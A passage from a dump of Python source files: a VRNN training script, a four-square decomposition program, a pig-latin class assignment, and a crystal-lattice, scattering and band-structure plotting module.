z2s_dim],\n nout=rnn_dim,\n unit='tanh',\n init_W=init_W,\n init_U=init_U,\n init_b=init_b)\n\n phi_1 = FullyConnectedLayer(name='phi_1',\n parent=['x_2', 's_tm1'],\n parent_dim=[x2s_dim, rnn_dim],\n nout=q_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n phi_2 = FullyConnectedLayer(name='phi_2',\n parent=['phi_1'],\n parent_dim=[q_z_dim],\n nout=q_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n phi_mu = FullyConnectedLayer(name='phi_mu',\n parent=['phi_2'],\n parent_dim=[q_z_dim],\n nout=z_dim,\n unit='linear',\n init_W=init_W,\n init_b=init_b)\n\n phi_sig = FullyConnectedLayer(name='phi_sig',\n parent=['phi_2'],\n parent_dim=[q_z_dim],\n nout=z_dim,\n unit='softplus',\n cons=1e-4,\n init_W=init_W,\n init_b=init_b_sig)\n\n prior_1 = FullyConnectedLayer(name='prior_1',\n parent=['s_tm1'],\n parent_dim=[rnn_dim],\n nout=p_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n prior_2 = FullyConnectedLayer(name='prior_2',\n parent=['prior_1'],\n parent_dim=[p_z_dim],\n nout=p_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n prior_mu = FullyConnectedLayer(name='prior_mu',\n parent=['prior_2'],\n parent_dim=[p_z_dim],\n nout=z_dim,\n unit='linear',\n init_W=init_W,\n init_b=init_b)\n\n prior_sig = FullyConnectedLayer(name='prior_sig',\n parent=['prior_2'],\n parent_dim=[p_z_dim],\n nout=z_dim,\n unit='softplus',\n cons=1e-4,\n 
init_W=init_W,\n                                        init_b=init_b_sig)\n\n        theta_1 = FullyConnectedLayer(name='theta_1',\n                                      parent=['z_2', 's_tm1'],\n                                      parent_dim=[z2s_dim, rnn_dim],\n                                      nout=p_x_dim,\n                                      unit='relu',\n                                      init_W=init_W,\n                                      init_b=init_b)\n\n        theta_2 = FullyConnectedLayer(name='theta_2',\n                                      parent=['theta_1'],\n                                      parent_dim=[p_x_dim],\n                                      nout=p_x_dim,\n                                      unit='relu',\n                                      init_W=init_W,\n                                      init_b=init_b)\n\n        theta_mu = FullyConnectedLayer(name='theta_mu',\n                                       parent=['theta_2'],\n                                       parent_dim=[p_x_dim],\n                                       nout=target_dim,\n                                       unit='linear',\n                                       init_W=init_W,\n                                       init_b=init_b)\n\n        theta_sig = FullyConnectedLayer(name='theta_sig',\n                                        parent=['theta_2'],\n                                        parent_dim=[p_x_dim],\n                                        nout=target_dim,\n                                        unit='softplus',\n                                        cons=1e-4,\n                                        init_W=init_W,\n                                        init_b=init_b_sig)\n\n        nodes = [rnn,\n                 x_1, x_2, z_1, z_2,\n                 phi_1, phi_2, phi_mu, phi_sig,\n                 prior_1, prior_2, prior_mu, prior_sig,\n                 theta_1, theta_2, theta_mu, theta_sig]\n\n        params = OrderedDict()\n\n        for node in nodes:\n            if node.initialize() is not None:\n                params.update(node.initialize())\n\n        params = init_tparams(params)\n\n        s_0 = rnn.get_init_state(batch_size)\n\n        x_1_temp = x_1.fprop([y], params)\n        x_2_temp = x_2.fprop([x_1_temp], params)\n\n        def inner_fn(x_t, s_tm1):\n\n            phi_1_t = phi_1.fprop([x_t, s_tm1], params)\n            phi_2_t = phi_2.fprop([phi_1_t], params)\n            phi_mu_t = phi_mu.fprop([phi_2_t], params)\n            phi_sig_t = phi_sig.fprop([phi_2_t], params)\n\n            prior_1_t = prior_1.fprop([s_tm1], params)\n            prior_2_t = prior_2.fprop([prior_1_t], params)\n            prior_mu_t = prior_mu.fprop([prior_2_t], params)\n            prior_sig_t = prior_sig.fprop([prior_2_t], params)\n\n            z_t = Gaussian_sample(phi_mu_t, phi_sig_t)\n            z_1_t = z_1.fprop([z_t], params)\n            z_2_t = z_2.fprop([z_1_t], params)\n\n            s_t = rnn.fprop([[x_t, z_2_t], [s_tm1]], params)\n\n            return s_t, phi_mu_t, phi_sig_t, prior_mu_t, prior_sig_t, z_2_t\n\n        ((s_temp, phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp, z_2_temp), updates) = \\\n            theano.scan(fn=inner_fn,\n                        sequences=[x_2_temp],\n                        outputs_info=[s_0, None, None, None, None, None])\n\n        # register the random-stream updates from scan; items() works on Python 2 and 3\n        for k, v in updates.items():\n            k.default_update = v\n\n        s_temp = concatenate([s_0[None, :, :], s_temp[:-1]], axis=0)\n        theta_1_temp = theta_1.fprop([z_2_temp, s_temp], params)\n        theta_2_temp = theta_2.fprop([theta_1_temp], params)\n        theta_mu_temp = theta_mu.fprop([theta_2_temp], params)\n        theta_sig_temp = theta_sig.fprop([theta_2_temp], params)\n\n        recon = Gaussian(y, theta_mu_temp, theta_sig_temp)\n        recon_term = recon.mean()\n        recon_term.name = 'recon_term'\n\n        kl_temp = KLGaussianGaussian(phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp)\n        kl_term = kl_temp.mean()\n        kl_term.name = 'kl_term'\n\n        nll_upper_bound = recon_term + kl_term\n        nll_upper_bound.name = 'nll_upper_bound'\n\n        model.inputs = [x, y]\n        model.params = params\n        model.nodes = nodes\n\n        optimizer = Adam(lr=lr)\n\n        extension = [\n            GradientClipping(batch_size=batch_size),\n            EpochCount(epoch),\n            Picklize(freq=1, force_save_freq=force_saving_freq, path=save_path),\n            WeightNorm()\n        ]\n\n        mainloop = Training(\n            name=pkl_name,\n            data=Iterator(train_data, batch_size),\n            model=model,\n            optimizer=optimizer,\n            cost=nll_upper_bound,\n            outputs=[nll_upper_bound],\n            extension=extension\n        )\n        mainloop.run()\n\nmain()\n\n\n\n\n","sub_path":"VRNN_Gauss_init.py","file_name":"VRNN_Gauss_init.py","file_ext":"py","file_size_in_byte":11362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"137349374","text":"# four-square.py: Lagrange's four-square theorem\r\n# coding: utf-8\r\n# Major category: Lagrange's four-square theorem\r\n# Middle category: 
Mathematics\r\n# Minor category: find a four-square decomposition of an integer\r\n# Reference:\r\n#\r\n# Feature: uses the math library, sqrt()\r\n\r\nfrom math import *\r\n# For verification: sum of the squares of the 4 integers given as a list\r\ndef verification(m):\r\n    result_v = 0\r\n    for i in range(4):\r\n        result_v = int(m[i])**2 + result_v\r\n    return result_v\r\n\r\n# For checking: sum of the squares of the integers given as 4 variables\r\ndef IndividualVariable(n1,n2,n3,n4):\r\n    result_i = n1**2 + n2**2 + n3**2 + n4**2\r\n    return result_i\r\n\r\n# Take the square root of the value and return its integer part\r\ndef square_n(n):\r\n    result_s = int(sqrt(n))\r\n    return result_s\r\n\r\n# Main: read an integer and output a four-square decomposition.\r\n# Note: this greedy descent does not always find a valid decomposition\r\n# (e.g. n=23), in which case the verification below prints NG.\r\nm = []\r\nn1 = 0\r\nn2 = 0\r\nn3 = 0\r\nn4 = 0\r\nn = int(input())\r\nif n != 0:\r\n    n1 = square_n(n)    # 1st integer\r\n    if n == IndividualVariable(n1,n2,n3,n4):\r\n        n2 = 0\r\n        n3 = 0\r\n        n4 = 0\r\n    else:\r\n        n2 = square_n(n - n1**2)    # 2nd integer\r\n        if n == IndividualVariable(n1,n2,n3,n4):\r\n            n3 = 0\r\n            n4 = 0\r\n        else:\r\n            n3 = square_n(n - n1**2 - n2**2)    # 3rd integer\r\n            if n == IndividualVariable(n1,n2,n3,n4):\r\n                n4 = 0\r\n            else:\r\n                n4 = square_n(n - n1**2 - n2**2- n3**2)    # 4th integer\r\n\r\nm.append(n1)\r\nm.append(n2)\r\nm.append(n3)\r\nm.append(n4)\r\n\r\n# Output the list of values found and the verification result\r\nif n == verification(m):\r\n    result = 'OK'\r\nelse:\r\n    result = 'NG'\r\nprint('n=',n,m,result)","sub_path":"four-square.py","file_name":"four-square.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"540342199","text":"#Python Template for ES2B4 Assignment - 2\n\n#Name: Vigneshwar Syamasundar\n#ID : U1527115\n#Assignment Section : A3_3\n\nfrom assignment2_a3_1 import pigLatin_class\n\n\t\nclass gibberish_class(pigLatin_class):\n\n\tdef pLatin_converter(self):\n\t\tfinalResult = \"\"\n\t\tlistOfWords = self.sentence.split()\n\t\tfor word in listOfWords:\n\t\t\textraChars = \"\"\n\t\t\tfor letter in word:\n\t\t\t\tif letter not in pigLatin_class.latinAlphabet:\n\t\t\t\t\tword = word.replace(letter, \"\")\n\t\t\t\t\textraChars += letter\n\t\t\tif not self.containsVowel(word):\n\t\t\t\tfinalResult += word[1:] + word[0] + extraChars + \"hay \"\n\t\t\telse:\n\t\t\t\tif word[0] in pigLatin_class.VOWELS:\n\t\t\t\t\tfinalResult += word + extraChars + \"way \"\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(len(word)):\n\t\t\t\t\t\tif word[i] in pigLatin_class.VOWELS:\n\t\t\t\t\t\t\tfinalResult += word[i:] + word[0:i] + extraChars + \"ay \"\n\t\t\t\t\t\t\tbreak\n\t\treturn finalResult\n\t\n\n\tdef gibberish_converter(self):\n\t\tfinalResult = \"\"\n\t\tlistOfWords = self.sentence.split()\n\t\tfor word in listOfWords:\n\t\t\tperWord = \"\"\n\t\t\tif word.lstrip(\"-\").isdigit():\n\t\t\t\tperWord += word + \" \"\n\t\t\tfor letter in word:\n\t\t\t\tif letter in pigLatin_class.VOWELS:\n\t\t\t\t\tperWord += \"idig\" + letter\n\t\t\t\telse:\n\t\t\t\t\tperWord += letter\n\t\t\tfinalResult += perWord + \" \"\n\t\treturn finalResult\n\t\t\t\n\ngibberishInstance = gibberish_class(\"?23ghj5ejk\")\nprint(gibberishInstance.gibberish_converter())\npigLatinInstance = gibberish_class(\"?23ghj5ejk\")\nprint(pigLatinInstance.pLatin_converter())\n\n\nreadFile = open(\"gibberish_tests.txt\" , \"r\")\nfor line in readFile:\n\tpigLatinInstance.setSentence(line)\n\tgibberishInstance.setSentence(line)\n\n\tpigLatinLine = pigLatinInstance.pLatin_converter()\n\tgibberishLine = gibberishInstance.gibberish_converter()\n\n\tpigLatinWrite = open(\"pigLatined.txt\", \"a\")\n\tpigLatinWrite.write(pigLatinLine + '\\n')\n\n\tgibberishWrite = open(\"gibberished.txt\", \"a\")\n\tgibberishWrite.write(gibberishLine + 
'\\n')\n\nreadFile.close()\npigLatinWrite.close()\ngibberishWrite.close()\n\n","sub_path":"assignment2_a3_3.py","file_name":"assignment2_a3_3.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"338589677","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom functools import partial\n\nimport lattices\nimport scattering\nimport band_structure\nimport gui\n\nd = (np.array([1, 0, 0]), np.array([0, 1, 0]), np.array([0, 0, 1]),\n np.array([0, 0, 0]), \"xkcd:cement\", 2, \"proper\", \"latticevectors\",\n [2, 2, 2])\n\n\neq = np.isclose\n\n\ndef Lattice(\n a1=d[0], a2=d[1], a3=d[2], basis=d[3], colors=d[4], sizes=d[5],\n lim_type=d[6], grid_type=None, max_=d[8], lattice_name=None,\n unit_type=None, indices=None, arrows=True, grid=True,\n verbose=False, returns=False, fig=None, ax=None, plots=True,\n rounder=True, checks=True):\n \"\"\"\n Creates, limits and plots the lattice\n \"\"\"\n\n # Minimum coefficients for lattice vectors\n min_ = [0, 0, 0]\n # Settings for grid lines\n g_col = 'k'\n g_w = 0.5\n # Number of points per plane\n num_plane_points = 20\n\n # Input sanitization\n if lattice_name is not None:\n lattice, basis, lattice_type = lattices.chooser(lattice_name,\n verbose=verbose)\n a1, a2, a3 = lattice\n # Classify the lattice\n else:\n a1, a2, a3 = np.array([a1, a2, a3])\n basis = np.array(basis)\n lattice_type = lattices.classifier(a1, a2, a3, basis)\n\n if checks:\n # Rotate the lattice, but only if we actually need to check it (for\n # example when we're not dealing with the gui)\n a1, a2, a3, basis = lattices.rotator(a1, a2, a3, basis,\n lattice_type, verbose=verbose)\n lattice = np.array([a1, a2, a3])\n\n # We need the number of basis-vectors.\n # If there is only 1 basis vector, then len(np.shape(basis)) == 1\n # otherwise the length is 2, and the first element is number of basis\n # vectors\n length_basis = np.shape(basis)\n if len(length_basis) == 1:\n n_basis = 1\n elif len(length_basis) > 1:\n n_basis = length_basis[0]\n\n # Make a list, n_basis long, for the colors and sizes,\n # if they're not specified.\n c_name = colors.__class__.__name__\n if c_name == \"str\":\n c = colors\n colors = []\n for i in range(n_basis):\n colors.append(c)\n elif c_name == \"list\" and len(colors) < n_basis:\n c = colors[0]\n colors = []\n for i in range(n_basis):\n colors.append(c)\n\n s_name = sizes.__class__.__name__\n if s_name == \"int\" or s_name == \"float\":\n s = sizes\n sizes = []\n for i in range(n_basis):\n sizes.append(s)\n elif s_name == \"list\" and len(sizes) < n_basis:\n s = sizes[0]\n sizes = []\n for i in range(n_basis):\n sizes.append(s)\n\n # Choosing gridline and unit cell type. First the default settings.\n latticelines = lattices.latticelines\n unitcells = lattices.unitcells\n\n if grid_type is None:\n grid_type = latticelines[lattice_type]\n\n if unit_type is None:\n unit_type = unitcells[lattice_type]\n else:\n try:\n unit_type = unit_type.lower()\n except AttributeError:\n print('Please input a string for unit_type. 
Giving primitive')\n unit_type = \"primitive\"\n\n if unit_type not in [\"primitive\", \"conventional\"]:\n print((\"Input either 'primitive' or 'conventional' for type.\"\n \" Giving 'primitive'\"))\n unit_type = \"primitive\"\n\n # Ugly hack for fixing bcc involving juggling of limits, so we plot 2 unit\n # cells (conventional) in each direction\n if (lattice_type in ['bcc', 'tetragonal body centred',\n 'orthorhombic body centred'] and\n max_ == [2, 2, 2] and lim_type == \"proper\" and (\n unit_type == \"conventional\")):\n max_ = [0, 0, 4]\n elif ('base centred' in lattice_type and max_ == [2, 2, 2] and\n lim_type == \"proper\" and unit_type == \"conventional\"):\n max_ = [0, 4, 2]\n\n # set the range of lattice vectors to be calculated\n r_min, r_max, n_min, n_max = lattices.find_limits(lim_type, a1, a2, a3,\n min_, max_,\n unit_type=unit_type)\n if rounder:\n r_min, r_max = np.around([r_min, r_max], decimals=5)\n if verbose:\n print(\"Limits found as: (type: {})\".format(lim_type))\n print(\"r_min, r_max, n_min, n_max:\")\n print(r_min, r_max, n_min, n_max)\n\n # if we plot the conventional cell we want to give r_min and r_max to\n # limiter. If not we want to give n_min and n_max\n if unit_type == \"conventional\":\n lim_min, lim_max = r_min, r_max\n else:\n lim_min, lim_max = n_min, n_max\n\n objects = lattices.generator(a1, a2, a3, basis, colors, sizes,\n n_min, n_max)\n if rounder:\n atomic_positions = np.around(objects[0], decimals=5)\n objects = [atomic_positions] + [i for i in objects[1:]]\n if verbose:\n print(\"Number of atoms and lattice points before limiting:\")\n print(objects[0].size / 3, np.sum(objects[-1]))\n # Objects to limit to the plot-box\n (atomic_positions, lattice_coefficients, atomic_colors, atomic_sizes,\n lattice_position) = lattices.limiter(points=objects[0],\n objects=objects,\n min_=lim_min,\n max_=lim_max,\n unit_type=unit_type,\n lattice=lattice,\n verbose=verbose)\n if verbose:\n print(\"Number of atoms and lattice points AFTER limiting:\")\n print(objects[0].size / 3, np.sum(objects[-1]))\n\n if indices is not None:\n if len(indices) != 3:\n print(\"We need 3 indices! 
We'll give you (1,1,1)\")\n indices = (1, 1, 1)\n d, planes = lattices.reciprocal(a1, a2, a3, indices, r_min, r_max,\n points=num_plane_points)\n planes = lattices.plane_limiter(planes, r_min, r_max)\n\n if verbose:\n print(\"Lattice: {}\".format(lattice_type))\n\n # Create the figure\n if fig is None:\n fig = plt.figure()\n if ax is None:\n ax = fig.gca(projection=\"3d\")\n\n # Plot atoms\n ax.scatter(atomic_positions[:, 0], atomic_positions[:, 1],\n atomic_positions[:, 2], c=atomic_colors, s=atomic_sizes)\n\n # Get the relevant gridlines:\n pruned_lines = lattices.grid_lines(a1, a2, a3, atomic_positions,\n lattice_position, grid_type,\n verbose=verbose)\n if grid:\n for line in pruned_lines:\n ax.plot(line[0], line[1], line[2], color=g_col, linewidth=g_w)\n\n if indices is not None:\n # If we plot the family of lattice planes, we plot the displacement\n # vector and the planes\n ax.quiver(0, 0, 0, d[0], d[1], d[2])\n ax.text(d[0] / 2, d[1] / 2, d[2] / 2, '$d$')\n for p in planes:\n ax.plot_surface(p[0], p[1], p[2], color='xkcd:cement', shade=False,\n alpha=0.4)\n elif arrows:\n # otherwise we plot the lattice vectors\n ax.quiver(0, 0, 0, a1[0], a1[1], a1[2])\n ax.quiver(0, 0, 0, a2[0], a2[1], a2[2])\n ax.quiver(0, 0, 0, a3[0], a3[1], a3[2])\n ax.text(a1[0] / 2, a1[1] / 2, a1[2] / 2, '$a_1$')\n ax.text(a2[0] / 2, a2[1] / 2, a2[2] / 2, '$a_2$')\n ax.text(a3[0] / 2, a3[1] / 2, a3[2] / 2, '$a_3$')\n\n # Set limits, orthographic projection (so we get the beautiful hexagons),\n # no automatic gridlines, and no axes\n ax.set_aspect('equal')\n ax.set_proj_type('ortho')\n\n plot_max = np.amax(r_max)\n plot_min = np.amin(r_min)\n ax.set_xlim([plot_min, plot_max])\n ax.set_ylim([plot_min, plot_max])\n ax.set_zlim([plot_min, plot_max])\n ax.grid(False)\n if not verbose:\n ax.axis('off')\n\n # make the panes transparent (the plot box)\n ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n\n if plots:\n plt.show()\n\n if returns:\n return fig, ax\n\n\nReciprocal = partial(Lattice, indices=(1, 1, 1))\n\n\ndef Scattering(lattice_name='simple cubic',\n basis=None,\n k_in=np.array([0, 0, -1.5]),\n form_factor=None,\n highlight=None,\n show_all=True,\n normalize=True,\n verbose=False,\n returns=False,\n return_indices=False,\n colors=None,\n laue_scale=1,\n fig=None,\n axes=None,\n plots=True):\n\n min_, max_ = (-2, -2, -1), (2, 2, 1)\n g_col = 'k'\n g_w = 0.5\n g_a = 0.6\n size_default = 36\n point_sizes = 2\n point_sizes *= size_default\n plane_z = 3.5\n beam_end_z = max_[2]\n unit_cell_type = \"conventional\"\n lim_type = \"proper\"\n outgoing_length = 10\n\n # input sanitization for the lattice/basis\n lattice_name = lattice_name.lower()\n if basis is not None:\n a1, a2, a3 = np.eye(3, dtype=int)\n basis = np.array(basis)\n else:\n lattice_name = lattice_name.lower()\n if lattice_name == \"bcc\":\n lattice_name = \"conventional bcc\"\n elif lattice_name == \"fcc\":\n lattice_name = \"conventional fcc\"\n elif lattice_name == \"simple cubic\":\n pass\n else:\n print(\"Allowed inputs: 'simple cubic', 'bcc', 'fcc'.\")\n return\n lattice, basis, _ = lattices.chooser(lattice_name, verbose=verbose)\n a1, a2, a3 = lattice\n\n grid_type = lattices.latticelines[lattice_name]\n\n # Getting the number of atoms in the basis\n length_basis = np.shape(basis)\n if len(length_basis) == 1:\n n_basis = 1\n elif len(length_basis) > 1:\n n_basis = length_basis[0]\n\n if form_factor is None:\n form_factor = [1] * n_basis\n\n if 
colors is None:\n form_fact_array = np.array(form_factor)\n if (form_fact_array == form_factor[0]).all():\n atom_colors = [\"xkcd:cement\"] * n_basis\n else:\n atom_colors = [\"xkcd:cement\"] + ([\"xkcd:cornflower blue\"] *\n (n_basis - 1))\n else:\n atom_colors = colors\n\n atom_sizes = [1] * n_basis\n\n # Normalizing wave vector (multiplying by k0 = 2Pi/a)\n k_in = np.array(k_in)\n\n if k_in[2] > 0:\n k_in[2] = -k_in[2]\n print((\"the z-coordinate of k_in should be negative. \"\n \"Flipping it: k_in = {}\".format(k_in)))\n\n k_title = np.copy(k_in)\n if normalize:\n k_in = k_in * 2 * np.pi\n\n # Calculating stuff for plotting the crystal\n r_min, r_max, n_min, n_max = lattices.find_limits(lim_type, a1, a2, a3,\n min_, max_,\n unit_cell_type)\n objects = lattices.generator(a1, a2, a3, basis, atom_colors,\n atom_sizes, n_min, n_max)\n objects = lattices.limiter(objects[0], objects, r_min, r_max,\n unit_cell_type)\n (atomic_positions, lattice_coefficients, atomic_colors, atomic_sizes,\n lattice_position) = objects\n\n pruned_lines = lattices.grid_lines(a1, a2, a3, atomic_positions,\n lattice_position, grid_type,\n verbose=verbose)\n\n # Create the neutron beam display vector\n k_disp = k_in / lattices.mag(k_in)\n lambda_ = 2 * np.pi / lattices.mag(k_in)\n\n # Scattering stuff\n intensities, k_out, indices = scattering.calc_scattering(a1, a2, a3, basis,\n form_factor,\n k_in)\n points = scattering.projection(k_out, p0=np.array([0, 0, plane_z]))\n\n # Plotting the basics\n detector_screen_position = [0.7, 0.2, 0.25, 0.625]\n if fig is None:\n fig = plt.figure(figsize=(10, 4))\n if axes is None:\n ax = fig.gca(projection=\"3d\")\n ax.set_position([0, 0, 0.7, 1])\n\n # Create second set of axes for detection screen\n ax2 = plt.axes(detector_screen_position)\n else:\n ax, ax2 = axes\n ax2.tick_params(axis=\"both\", labelbottom=False, labelleft=False)\n ax2.set_aspect('equal', 'box')\n\n # Plot atoms\n ax.scatter(atomic_positions[:, 0], atomic_positions[:, 1],\n atomic_positions[:, 2], c=atomic_colors, s=atomic_sizes)\n\n for line in pruned_lines:\n ax.plot(line[0], line[1], line[2],\n color=g_col, linewidth=g_w, alpha=g_a)\n\n # Plotting the beam: First we create the beam display vector\n ax.quiver(0, 0, beam_end_z, k_disp[0], k_disp[1], k_disp[2],\n color='b', lw=2, pivot='tip', length=lambda_ * laue_scale)\n\n if intensities.size == 0:\n print(\"There is no scattering for this choice of k_in\")\n\n else:\n # I assume the points are unique, now that I have deleted the ones\n # pointing into the crystal\n\n # Normalize intensities\n intensities /= np.amax(intensities)\n # Create the color array\n colors = np.zeros((intensities.size, 4))\n colors[:, 3] = intensities\n\n if highlight is not None:\n # Checking for proper highlighting\n hi_index = np.array(highlight)\n num_ints = hi_index.shape\n extra = 0\n if num_ints != (3,):\n print(\"We need 3 and only 3 indices! 
Highlighting nothing\")\n else:\n indices_index = np.where((indices == hi_index).all(axis=1))[0]\n if indices_index.shape != (1,):\n print(\"There is no scattering along {}\".format(highlight))\n else:\n # We have highlighting!\n d, planes = lattices.reciprocal(a1, a2, a3, hi_index,\n r_min - extra,\n r_max + extra,\n points=20)\n planes = lattices.plane_limiter(planes, r_min - extra,\n r_max + extra)\n # We change the color of highlighted point and plot the\n # family of planes\n high_intensity = intensities[indices_index]\n colors[indices_index] = [1, 0, 0, high_intensity]\n for p in planes:\n ax.plot_surface(p[0], p[1], p[2], color=\"r\",\n shade=False, alpha=0.2)\n # We also plot the outgoing line corresponding to this\n # scattering. First we get the point (and squeeze it, to\n # make it 1D again)\n p = np.squeeze(points[indices_index, :])\n start = np.array([0, 0, beam_end_z])\n ray = p - start\n line = np.array([start, start + outgoing_length * ray])\n ax.plot(line[:, 0], line[:, 1], line[:, 2], color='r',\n alpha=0.3, ls='--',\n lw=g_w * 2)\n # Plotting outgoing vector and Laue condition\n k_out_high = np.squeeze(k_out[indices_index])\n G_high = k_in - k_out_high\n vecs = np.array([k_out_high, k_out_high, G_high])\n vecs_disp = vecs / lattices.mag(k_in)\n starts = np.array([start,\n start - k_disp * lambda_ * laue_scale,\n (start - vecs_disp[2] * lambda_ *\n laue_scale)])\n ax.quiver(starts[:, 0],\n starts[:, 1],\n starts[:, 2],\n vecs_disp[:, 0],\n vecs_disp[:, 1],\n vecs_disp[:, 2],\n color=['r', 'r', 'g'],\n alpha=0.5,\n lw=1,\n length=lambda_ * laue_scale)\n\n ranges = (np.amax(points, axis=0) - np.amin(points, axis=0))[:-1]\n ax2.scatter(points[:, 0], points[:, 1], c=colors)\n for i in range(len(indices)):\n x, y = points[i, 0:2] - 0.05 * ranges\n s = indices[i]\n c = colors[i, :-1]\n ax2.text(x, y, s, color=c, va='top', ha='right')\n\n # Plotting detection plane\n abs_ex = 0.0\n rel_ex = 0.1\n def_y = 2\n def_x = 2\n x_min = np.amin(points[:, 0]) * (1 + rel_ex) - abs_ex\n x_max = np.amax(points[:, 0]) * (1 + rel_ex) + abs_ex\n y_min = np.amin(points[:, 1]) * (1 + rel_ex) - abs_ex\n y_max = np.amax(points[:, 1]) * (1 + rel_ex) + abs_ex\n x_range = np.array([min(x_min, -def_x), max(x_max, def_x)])\n y_range = np.array([min(y_min, -def_y), max(y_max, def_y)])\n x, y = np.meshgrid(x_range, y_range)\n z = plane_z * np.ones(x.shape)\n ax.plot_surface(x, y, z, color='k', alpha=0.2)\n\n # plotting intersections\n ax.scatter(points[:, 0], points[:, 1], plane_z, color=colors)\n\n # Setting limits for the second figure\n det_max_x = np.amax(x_range)\n det_min_x = np.amin(x_range)\n det_max_y = np.amax(y_range)\n det_min_y = np.amin(y_range)\n det_max = max(det_max_x, det_max_y)\n det_min = min(det_min_x, det_min_y)\n ax2.set_xlim(det_min, det_max)\n ax2.set_ylim(det_min, det_max)\n\n if show_all:\n # Plotting outgoing vectors\n n = k_out.shape[0]\n k_plot = k_out / lattices.mag(k_in)\n start_point = np.array((0, 0, beam_end_z))\n start_points = np.repeat(np.atleast_2d(start_point), n, axis=0)\n ax.quiver(start_points[:, 0],\n start_points[:, 1],\n start_points[:, 2],\n k_plot[:, 0],\n k_plot[:, 1],\n k_plot[:, 2],\n color='g',\n alpha=0.5,\n lw=g_w,\n length=lambda_)\n\n # plotting outgoing lines\n for p in points:\n ray = p - start_point\n line = np.array([start_point,\n start_point + outgoing_length * ray])\n ax.plot(line[:, 0], line[:, 1], line[:, 2],\n color='k', alpha=0.3, ls='--',\n lw=g_w)\n\n ax.set_aspect('equal')\n ax.set_proj_type('ortho')\n ax.xaxis.set_pane_color((1.0, 1.0, 
1.0, 0.0))\n ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n\n # Some limit trickery. We make the plot box cubic:\n plot_max = np.amax(r_max)\n plot_min = np.amin(r_min)\n ax.set_xlim(plot_min, plot_max)\n ax.set_ylim(plot_min, plot_max)\n ax.set_zlim(plot_min, plot_max)\n\n ax.grid(False)\n ax.axis('off')\n\n tit = (r'Scattering on a cubic lattice. $k_{in} = (2\\pi/a)\\cdot$' +\n '{}'.format(k_title))\n tit2 = (r'Scattering on a cubic lattice. $k_{in} = $' +\n '{}'.format(k_title))\n if normalize:\n ax.set_title(tit)\n else:\n ax.set_title(tit2)\n ax2.set_title('Detection screen.\\nForm factors: {}'.format(form_factor))\n if plots:\n plt.show()\n return_list = []\n if returns:\n return_list += [fig, ax, ax2]\n if return_indices:\n return_list.append(indices)\n if returns or return_indices:\n return return_list\n\n\ndef Band_structure(V0=0, n_k=51, G_range=list(range(-3, 4)),\n potential=\"harmonic\", edges=False,\n E_F=None,\n returns=False,\n plots=True):\n\n # First some input sanitization\n potentials = {\"harmonic\": band_structure.VG_cos,\n \"dirac\": band_structure.VG_dirac}\n class_name = potential.__class__.__name__\n if class_name not in [\"function\", \"str\"]:\n print((\"Please input either 'dirac', 'harmonic' or the name of your \"\n \"own potential function. Giving harmonic.\"))\n potential = band_structure.VG_cos\n elif class_name == \"str\":\n if potential.lower() not in [\"dirac\", \"harmonic\"]:\n print((\"Please input either 'dirac' or 'harmonic' as the \"\n \"potential. Giving harmonic.\"))\n potential = band_structure.VG_cos\n potential = potentials[potential.lower()]\n\n # We calculate the band structure\n o = band_structure.calc_band_structure(V0=V0, n_k=n_k, G_range=G_range,\n potential=potential)\n kxs, kys, band, max_E = o\n if E_F is None:\n E_F = max_E\n E_F_mat = max_E * np.ones((n_k, n_k))\n max_k = np.amax(kxs)\n min_k = np.amin(kxs)\n\n # Create the figure\n fig = plt.figure(figsize=(10, 4))\n ax = fig.gca(projection=\"3d\")\n ax.set_position([0.05, 0, 0.5, 1])\n\n # Optional plotting of Fermi surface in main axes.\n ax.contour(kxs, kys, band, E_F, colors='r', linewidths=3)\n\n # Plotting of the main event: the band structure\n ax.plot_surface(kxs, kys, band, alpha=0.9)\n ax.plot_surface(kxs, kys, E_F_mat, alpha=0.2)\n ax.set_xlim([min_k, max_k])\n ax.set_ylim([min_k, max_k])\n ax.set_xlabel(r'$k_x/k_0$')\n ax.set_ylabel(r'$k_y/k_0$')\n ax.set_zlabel(r'$E/E_0$')\n ax.set_title(('Band structure of square lattice. ' +\n '$V_0/E_0 = {}$. 
$E_F = {}$'.format(V0, np.round(E_F, 3))))\n\n # optional plotting of the edges\n if edges:\n # First we get the edges and wave vectors\n edge1 = band[0, :]\n edge2 = band[-1, :]\n edge3 = band[:, 0]\n edge4 = band[:, -1]\n k = kxs[0, :]\n start = -1 / 2 * np.ones(k.shape)\n end = 1 / 2 * np.ones(k.shape)\n\n # And plot them.\n ax.plot(k, start, edge1, c='k')\n ax.plot(k, end, edge2, c='k')\n ax.plot(start, k, edge3, c='k')\n ax.plot(end, k, edge4, c='k')\n\n # Plotting of the second set of axes\n ax2 = plt.axes([0.7, 0.2, 0.25, 0.6])\n ax2.contour(kxs, kys, band, E_F)\n ax2.set_xlabel(r'$k_x/k_0$')\n ax2.set_ylabel(r'$k_y/k_0$')\n ax2.set_title('Fermi surface')\n\n if plots:\n plt.show()\n\n if returns:\n return fig, ax, ax2\n\n\nif __name__ == \"__main__\":\n gui.main()\n","sub_path":"cmp.py","file_name":"cmp.py","file_ext":"py","file_size_in_byte":22870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"465342906","text":"\"\"\"\nRecent Past Behaviors analysis. Version 4 of past_behavior.\nCount number of events of each type in a time 